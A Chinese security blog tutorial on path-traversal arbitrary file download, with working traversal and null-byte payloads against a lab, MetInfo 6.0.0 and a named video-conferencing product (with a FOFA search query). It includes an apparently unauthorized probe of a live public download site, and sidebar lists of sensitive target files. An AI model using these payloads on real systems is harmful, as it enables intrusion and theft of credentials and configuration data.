任意文件下载、文件读取

最新推荐文章于 2024-05-10 03:48:26 发布
最新推荐文章于 2024-05-10 03:48:26 发布
阅读量2k 收藏 8
点赞数 5
分类专栏: 渗透测试 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/119898768
版权

目录

简介

文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。

如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。此时如果攻击者提交的不是一个程序预期的的文件名,而是一个精心构造的路径(比如…/…/…/etc/passwd),则很有可能会直接将该指定的文件下载下来。 从而导致后台敏感信息(密码文件、源代码等)被下载。

所以,在设计文件下载功能时,如果下载的目标文件是由前端传进来的,则一定要对传进来的文件进行安全考虑。 切记:所有与前端交互的数据都是不安全的,不能掉以轻心!

危害

攻击者可以读取下载服务器中的配置文件、敏感文件等,会提供攻击者更多可用信息,提高被入侵的风险。

脑图

利用条件

  1. 存在读文件的函数
  2. 读取文件的路径用户可控且未校验或校验不严
  3. 输出了文件内容
  4. 任意文件读取下载漏洞测试

测试思路

寻找读取或下载文件的功能点,跳跃目录获取敏感文件。有的限制目录不严格,只对部分目录限制,可以尝试用其他敏感文件路径

靶机测试

使用web for pentester进行测试,我们这里不研究攻击靶场的思路,如果你有兴趣,可以通过“参考”中给出的Web for Pentester 靶场学习记录进一步学习它。

安装

下载地址:https://download.vulnhub.com/pentesterlab/web_for_pentester_i386.iso
像安装普通的linux系统那样安装即可,启动它后,即可直接进入,没有繁杂的操作系统安装过程。
我们这里选择的是目录穿越,作为演示案例。
在这里插入图片描述

Example 1

鼠标右键“查看图像”,知道默认头像地址是

http://x.x.x.x/dirtrav/example1.php?file=hacker.png

在这里插入图片描述
在这里插入图片描述

按照「测试思路」中提到的方式,使用../../../的形式造成目录穿越,进行任意文件下载。
这里实际上不能下载,只能显示在浏览器中😓

http://192.168.239.134//dirtrav/example1.php?file=../../../../../etc/passwd

在这里插入图片描述

Example 2

方法同上,鼠标右键“查看图像”,知道默认头像地址是

http://192.168.239.134/dirtrav/example2.php?file=/var/www/files/hacker.png

在这里插入图片描述

对文件名进行修改,把hacker.png替换为../../../../../etc/passwd,得出地址:

http://192.168.239.134/dirtrav/example2.php?file=/var/www/files/../../../../../etc/passwd

在这里插入图片描述

Example 3

由于靶场在我们的文件后面手动添加了 .png 后缀,导致我们不能随心所欲的读取文件了,那就00截断。
方法同上,鼠标右键“查看图像”,知道默认头像地址是

http://192.168.239.134/dirtrav/example3.php?file=hacker

在这里插入图片描述

构造payload:

http://192.168.239.134//dirtrav/example3.php?file=../../../../../../../etc/passwd%00

在这里插入图片描述

CMS测试

这里选的是MetInfo cms 6.0.0 进行任意文件读取漏洞演示

安装

下载地址:https://www.metinfo.cn/upload/file/MetInfo6.0.0.zip
漏洞环境:phpstudy、windows
存在漏洞:任意文件读取
在pupstudy的www目录下新建一个文件夹,然后把压缩包解压进去,重启phpstudy,浏览器访问
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

利用过程

漏洞点在:MetInfo6.0.0/include/thumb.php?dir=
浏览器访问为:
在这里插入图片描述

BurpSuite重放:
MetInfo6.0.0/include/thumb.php?dir=http\..\..\config\config_db.php
在这里插入图片描述

实战-1

「银澎云计算 好视通视频会议系统」 存在任意文件下载,攻击者可以通过漏洞获取敏感信息

FOFA

app=“Hanming-Video-Conferencing”

漏洞复现

登录界面如图
在这里插入图片描述

漏洞URL为:

https://xxx.xxx.xxx.xxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini

在这里插入图片描述

实战-2

智能电视网:http://down.znds.com/
当我下载一个文件的时候,把鼠标放在“立即下载”上面,左下角会出现一个链接(用箭头指向了),点一下“立即下载”,文件就会下载下来,那么对着“立即下载”按钮鼠标右键复制此链接,即,拿到下载地址
在这里插入图片描述

分析

下载下来的文件名称是:dangbeimarket_4.2.9_262_znds.apk
复制出来的下载地址是:http://down.znds.com/getdownurl/?s=L3VwZGF0ZS8yMDIxLTAzLTExL2RhbmdiZWltYXJrZXRfNC4yLjlfMjYyX3puZHMuYXBr

会发现L3VwZGF0ZS8yMDIxLTAzLTExL2RhbmdiZWltYXJrZXRfNC4yLjlfMjYyX3puZHMuYXBr看起来像是一个base64编码的东西,解码之后:
在这里插入图片描述

发现与我们下载的文件名对上了。
这里其实就很类似前面的靶机了,限制可以下载任意文件,但是下载敏感文件还是不能的,譬如访问:http://down.znds.com/getdownurl/?s=…/…/…/…/…/…/…/…/…/…/…/…/…/…/etc/password,编码之后就是http://down.znds.com/getdownurl/?s=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3b3Jk,访问之后
在这里插入图片描述

但是下载普通文件应该还是绰绰有余的

漏洞修复方案

1:对./../..\等进行过滤
2:严格控制可读取或下载的文件路径

参考

[红日安全]Web安全Day9 - 文件下载漏洞实战攻防
Web for Pentester 靶场学习记录

lainwith
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
herewshow#poc#银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-624371
07-25
银澎云计算 好视通视频会议系统 任意文件下载漏洞描述银澎云计算 好视通视频会议系统 存在任意文件下载,攻击者可以通过漏洞获取敏感信息漏洞影响银澎云计算 好视通视
windows文件操作总结
ylh的博客
10-18 885
就像遍历进程和模块一样,我们有一个FindFiirstFile 和 FindNextFile 函数。CreateFile操作比较复杂,在这里举一个简单的例子:往文件写入信息。注意CreateFIle的参数即可,按F1可以查看具体。GetFileSize 获取文件大小。DeleteFile 删除文件。WriteFile文件写入。ReadFile文件读取。CopyFile 复制文件。MoveFile 移动文件
网络安全最新任意文件读取 下载漏洞总结_任意文件下载漏洞(1),2024网络安全高级面试题总结
最新发布
weixin_57992300的博客
05-10 1090
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。然后逐个下载我们需要审计的代码文件,但是下载的时候变得很繁琐,我们只能尝试去猜解目录,然后下载一些中间件的记录日志进行分析。总体来说,任意文件下载漏洞的利用主要是为了信息收集,我们通过对服务器配置文件的下载,获取到大量的配置信息、源码,从而根据获取的信息来进一步挖掘服务器漏洞从而入侵。因为权限决定我们能下载的文件范围。
漏洞挖掘-从任意文件读取漏洞到获取账户利用
m0_60571990的博客
03-07 869
漏洞挖掘-从任意文件读取漏洞到获取账户利用
Caucho Resin viewfile远程文件读取 解决方法
黄树茂博客
05-05 1608
/usr/local/resin-4.0.33/conf/resin.xml 删除这三行 <resin:if test="${resin_doc}"> <web-app id="/resin-doc" root-directory="${resin.root}/doc/resin-doc"/> </resin:if> ...
任意文件读取
cgjil的博客
09-10 269
​ 一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕就可以查看或下载任意文件。这些文件可以是源代码文件,配置文件,敏感文件等等。过,​ 任意文件读取与下载可能形式不同,但是从本质上讲读取与下载没有区别,从权限角度来讲,读取与下载都需要读权限。
泛微云桥 e-Bridge 任意文件读取.md
04-11
泛微云桥 e-Bridge 任意文件读取
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
nc57-任意文件读取漏洞补丁
06-08
【标题】"nc57-任意文件读取漏洞补丁" 涉及的是一个针对NC57软件的安全问题,该补丁旨在修复一个可能导致任意文件读取的漏洞。在网络安全领域,这样的漏洞通常是非常严重的问题,因为它允许攻击者未经授权访问系统上...
致远OA任意文件下载1
08-08
致远OA任意文件下载漏洞 致远OA是一款由北京致远互联软件股份有限公司研发的办公系统,旨在为企业提供一站式的办公解决方案。然而,在致远OA的webmail.do文件中存在一个任意文件下载漏洞,攻击者可以通过修改...
php读取csv实现csv文件下载功能
10-26
首先,让我们来看第一种情况:读取CSV文件进行下载。这段代码的关键在于设置HTTP响应头和使用`readfile()`函数。以下是一个简单的示例: ```php $fileName = "prefs.csv"; header('Content-Type: application/...
常见poc漏洞模块,直接导入用。
07-22
一些只有你自己知道的漏洞,或者比较偏门的漏洞,就需要咱们自己来编写PoC或者是EXP。因为Goby没有开源,所以也能编写一些基于http命令执行的漏洞!
文件的相关操作
QAxiaoming的博客
09-15 683
1.写入文件 2.读取文件 以数组形式输出 循环输出带有汉字的文件 文件里边写输入文字 读取图片
任意文件读取的深度利用
向阳-Y.的博客
04-12 1340
任意文件读取的深度利用 任意文件读取的利用思路 有些文件需要高权限才能读取 /etc/passwd # 用户情况 /etc/shadow # 直接 John the Ripper /etc/hosts # 主机信息 /root/.bashrc # 环境变量 /root/.bash_history # 还有root外的其他用户 /root/.viminfo # vim 信息 /root/.ssh/id_rsa # 拿私钥直接ssh /proc/xxxx/cmdline # 进程状态枚举 xxxx 可以为000
红队专题-漏扫-Xray
aming小老弟
03-08 964
Xray扫描器是一款功能强大的安全评估工具,它主要使用HTTP/HTTPS代理进行被动扫描。这款工具由多名经验丰富的一线安全从业者开发,具备多种特性使其在安全扫描和漏洞检测方面表现出色。Xray扫描器支持多种扫描和检测模块,包括SQL注入检测、命令注入检测、任意重定向检测、路径遍历模块等。此外,它还具有一些内置插件,如XSS漏洞检测、XML实体注入检测等,这些插件能够进一步提升其漏洞检测能力。在使用Xray扫描器时,可以通过开启监听、设置浏览器代理等方式,使其能够自动探测访问网站的漏洞。
【MetInfo任意文件读取】--任意文件读取漏洞
m0_63241485的博客
08-29 3624
任意文件读取漏洞分析
Vmware Vcenter 任意文件读取漏洞
战神/calmness的博客
10-14 5359
目录 1、描述 2、环境 3、过程 4、修复建议 Vmware Vcenter 任意文件读取漏洞 时间2020年10月13日 1、描述 VMware vCenterServer 【服务器管理软件】提供了一个可伸缩、可扩展的平台,为 虚拟化管理奠定了基础。VMware vCenter Server(以前称为 VMware VirtualCenter),可集中管理 VMware vSphere 环境,与其他管理平台相比,极大地提高了 IT 管理员对虚拟环境的控制。VMware vCenter ..
任意文件读取漏洞 利用指南
coderge's CSDN Blog.
04-21 5365
文章目录判断系统类型 (Linux的具体发行版)其他说明 (服务器进程权限判断)关于字典各字段的简要说明ApachetomcatNginxjettysystem procsshnetworkapplicationcommonprotocolSSRF 内网探测Windows 原文 https://woj.app/6663.html 基本思路就是尝试读取敏感文件以获取尽可能多的信息。 比如, /etc/issue 可以确认 Linux 主机的发行版, 其中 .bash_history, ssh相关路径 中可
【漏洞复现系列】Apache Solr SSRF文件读取漏洞(附0day POC
qq_41703976的博客
03-19 1609
漏洞详情 Apache Solr <= 8.8.1均受影响,通杀所有版本,官方拒绝修复 通过Solr提供的API可以开启远程开启文件读取: curl -d '{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://xx.xx.xx.xx:8984/solr/corename/config -H 'Content-type:application/json' 再传入文件
struts2 020 任意文件下载
09-06
struts2是一种基于Java的开源框架,用于开发Web应用程序。在早期版本的struts2中存在一个安全漏洞,即struts2 020任意文件下载。这个漏洞允许攻击者下载服务器上的任意文件,可能是敏感信息或者可执行文件。 当一个struts2应用程序被配置为使用动态方法调用(DMI)时,攻击者可以构造一个恶意的URL请求,通过漏洞获取和下载任意文件。攻击者可以通过URL中的特殊字符和参数来伪造请求,并使用已知文件路径的结尾来读取文件内容或执行文件。 为了解决这个漏洞,struts2社区发布了相应的安全补丁。开发者应该及时升级他们的struts2版本,并遵循最佳实践来防止任意文件下载漏洞。 以下是一些防止struts2 020任意文件下载漏洞的措施: 1. 及时更新struts2版本:确保使用的是最新的稳定版本,这样可以最大程度地减少已知漏洞带来的风险。 2. 输入验证和过滤:对用户输入进行验证和过滤,尤其是文件的路径或文件名参数。可以使用安全的文件路径自检函数,如struts2提供的FileUploadInterceptor。 3. 安全配置:在struts.xml配置文件中,禁用动态方法调用(DMI),并限制只允许访问必要的Action方法。 4. 强化访问控制:确保只有授权用户能够访问敏感文件,并在服务器上采取必要的安全措施来限制对文件的访问。 5. 安全审计:定期进行安全审计,查找潜在的漏洞和弱点,并修复它们。 总的来说,struts2 020任意文件下载漏洞是一个严重的安全威胁。为了保护应用程序和服务器的安全,开发者应该及时升级版本,并采取适当的安全措施来防止攻击者利用这个漏洞获取敏感信息或执行恶意文件

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值